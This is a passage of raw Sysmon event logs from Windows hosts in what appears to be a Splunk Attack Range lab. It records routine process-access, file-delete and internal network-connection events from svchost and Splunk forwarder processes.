10341000x8000000000000000439595Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:30.043{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291073Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:31.319{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5A872BC151E58061EF7F80F39058BD7,SHA256=F9B694D501A5816DAB46B2F330E5DEBF9969F574B7CC0AC347246C9A78F4C779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439600Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:31.566{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66935DED1B46A3A29129455696FDE23,SHA256=A2273E5771AA759658AFCCD8A117B2C8455E61948C8A31A8B23FE2FE4940F0C3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439599Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:31.044{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439598Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:31.044{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291075Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:32.337{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=146C06EE4194CC0E7F9CF2BD83BF05DB,SHA256=59E3DCB41CE5A1ACA9B2598F4BCBBD6F748EB2BB0771C4E3F44E5AE3A896CD10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439604Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:32.569{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B77C63185B6D690B2F86CC2495A03DFD,SHA256=79046508EA2222F7B7EAA94E5D3990FDC0E2C66B11C3EEAE6858119F68F34FCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291074Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:32.236{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50DEF5BAD66675085E218DE2FC677F57,SHA256=D25E960EAD5DBAFD4FDA069DE8E244A63AA311EF53998E246BE1ECEAE6DA5D2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439603Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:32.275{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E85FFD27DD5E8B3823021913A3838F5,SHA256=EACBB817ABEA59E5CD761F1187E1820490CF070C99B7D290C04100E37E79DF7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439602Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:32.045{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439601Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:32.045{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439608Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:33.591{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87E9A2C4BC5CBAAD3A994B3942367D27,SHA256=CE09B9DF49F70D87EE5566F20F1A4069156B6E2CCE2503C73433AF79EC13B701,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291077Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:33.372{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3817183113D055969ECF862CAF96AE39,SHA256=AEC0942203A0B96D34D70A84704174460E9E3586B8D66A74AF509CA6032CCD61,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291076Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:30.446{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50589-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x8000000000000000439607Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:29.508{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62368-false10.0.1.12-8000- 10341000x8000000000000000439606Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:33.045{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439605Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:33.045{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439611Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:34.608{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=095E09F48758F35D92EEB3D1897015AF,SHA256=9BBB96F3DEFACE6B222BA31E7791A5B475428EC9AEEA059C8C5D81DE796B9D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291078Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:34.375{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BABE6E9EC2E0C7EDD1B1AC0F353142D3,SHA256=1609A1540633A82E630C27DBEEF0335EB7B4C9D3564C9ADD8C6EC860A298EC97,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439610Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:34.046{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439609Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:34.046{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439614Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:35.841{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=437FBC1D69DB765907961813CD3736DB,SHA256=A51452142F31C851B1A2E6E0358ADBA19793853FAA2D5AB34730E41E5EDD2245,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291079Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:35.396{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53E9C38FC88413D5B0A946104D56764E,SHA256=7C95D8392E90708E0371E0F0C48533AE0D3468F1ED22A68E30A81F93821E2BD1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439613Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:35.047{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439612Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:35.047{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291080Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:36.429{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=632BC586C5A1FA9C5CD1D6206751A846,SHA256=80ED3D93410EFEDC40E867149E47D942A402F09B99A6B12425356BFA0CD7B5AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439616Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:36.048{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439615Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:36.048{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291081Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:37.431{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF17749B1FAFB99A6CB4CB0F85B0CA55,SHA256=88011E51334A7D22DE21A734010D8E78C8E7E465660DD51AE6F7C9AC24E725F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439620Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:37.178{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3EC3CF9453D56EA164040EB933D218F8,SHA256=279D5C2180AB943233B86F92C492BA333DF920112F21FEED4E068B3731563295,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439619Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:37.048{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439618Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:37.048{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000439617Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:37.047{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA15303B1B99225492412F7396E941F2,SHA256=C9B59C1911FBAD5D408E02982E33C2F78F8B805EA5AFFE8647D7E06D52690EFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291085Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:36.376{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50590-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291084Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:38.433{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0605A831B7C9757D50C84F00C59BD234,SHA256=A295A743FBBD6614A6205DA39D2440B61E075573D87F53C996918B26659839AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439624Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:34.631{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62369-false10.0.1.12-8000- 23542300x8000000000000000439623Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:38.058{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=242FE6C36222AE237B309437B5725C79,SHA256=FCD7BFF6182D7792BDB7235F3A71CC850B05DDA876783AE539B132E11A326596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291083Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:38.101{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7F933314535AB2C4450A1B22A81ADD5,SHA256=17C81974BCCCF0B0808CB76D4FEE7487CFBCA9E2210850022E6359CC6984D336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291082Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:38.101{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2D62068294518B2454EFF4D6D4368E1B,SHA256=501565218DF38D9E1C565B5016A1BD62C77342E4AAFF8D6E2D84010FBF20FEA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439622Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:38.049{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439621Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:38.049{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291086Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:39.451{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D168C33A1F25D54520A13001BB29DCA,SHA256=C2E5528E6DB56F67C154F7860F03207785D700F20D9B109746C9096D684168A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439627Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:39.073{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DAF1BF470CF90B235D7BC75F1DFA76,SHA256=855050924898715FF0854800E0ECFAD16F56C44417B0EE7AEF6A882303FEEAF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439626Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 